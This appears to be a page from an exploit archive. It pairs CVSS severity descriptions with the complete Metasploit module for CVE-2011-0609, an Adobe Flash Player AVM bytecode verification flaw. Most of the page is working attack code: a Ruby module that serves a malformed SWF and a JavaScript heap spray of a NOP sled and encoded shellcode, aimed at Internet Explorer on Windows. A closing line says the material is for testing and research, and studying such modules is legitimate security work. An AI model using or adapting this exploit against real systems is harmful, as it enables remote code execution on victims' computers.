The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
High
PR
The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable system allowing full access to the vulnerable system’s settings and files.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
##
# $Id: adobe_flashplayer_avm.rb 12091 2011-03-23 04:41:48Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Flash Player AVM Bytecode Verification',
'Description' => %q{
This module exploits a vulnerability in AVM2 action script virtual machine used
in Adobe Flash Player versions 9.0 through 10. The AVM fails to properly verify
bytecode streams prior to executing it. This can cause uninitialized memory to be
executed.
Utilizing heap spraying techniques to control the uninitialized memory region it is
possible to execute arbitrary code. Typically Flash Player is not used as a
standalone application. Often, SWF files are embeded in other file formats or
specifically loaded via a web browser. Malcode was discovered in the wild which
embeded a malformed SWF file within an Excel spreadsheet. This exploit is based
off the byte stream found within that malcode sample.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bannedit' # Metasploit version
],
'Version' => '$Revision: 12091 $',
'References' =>
[
['CVE', '2011-0609'],
['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],
['URL', 'http://www.adobe.com/devnet/swf.html'],
['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'HTTP::compression' => 'gzip',
'HTTP::chunked' => true,
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { 'Ret' => 0x04040404 }],
],
'DisclosureDate' => 'Mar 15 2011',
'DefaultTarget' => 0))
end
def load_swfs
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0609.swf" )
fd = File.open( path, "rb" )
trigger = fd.read(fd.stat.size)
fd.close
return trigger
end
def on_request_uri(cli, request)
trigger = load_swfs
trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
if request.uri.match(/\.swf/i)
print_status("Sending Trigger SWF")
send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
return
end
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
nops = [target.ret].pack('V')
nop_sled = Rex::Text.to_unescape(nops, Rex::Arch.endian(target.arch))
var_blocks = rand_text_alpha(rand(6)+3)
var_shellcode = rand_text_alpha(rand(6)+3)
var_index = rand_text_alpha(rand(6)+3)
var_nopsled = rand_text_alpha(rand(6)+3)
spray_func = rand_text_alpha(rand(6)+3)
obj_id = rand_text_alpha(rand(6)+3)
# The methods used in this exploit currently could be improved. Heap spraying can likely
# be done using ActionScript. I am still investigating this possibility. Additionally,
# Hafei Li has been conducting some interesting research in the area of ActionScript
# related vulnerabilities which could be leveraged for this exploit.
#
# Currently this method only works with IE as Firefox runs Flash in a container process
# which is uneffected by JS heap spraying.
html = <<-EOS
<html>
<head>
</head>
<body>
<script>
function #{spray_func}() {
#{var_blocks} = new Array();
var #{var_shellcode} = unescape("#{shellcode}");
var #{var_nopsled} = unescape("#{nop_sled}");
do { #{var_nopsled} += #{var_nopsled} } while (#{var_nopsled}.length < 8200);
for (#{var_index}=0; #{var_index} < 25000; #{var_index}++)
#{var_blocks}[#{var_index}] = #{var_nopsled} + #{var_shellcode};
}
#{spray_func}();
</script>
<center>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
id="#{obj_id}" width="0" height="0"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="#{trigger_file}" />
</object>
</center>
</body>
</html>
EOS
print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}")
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum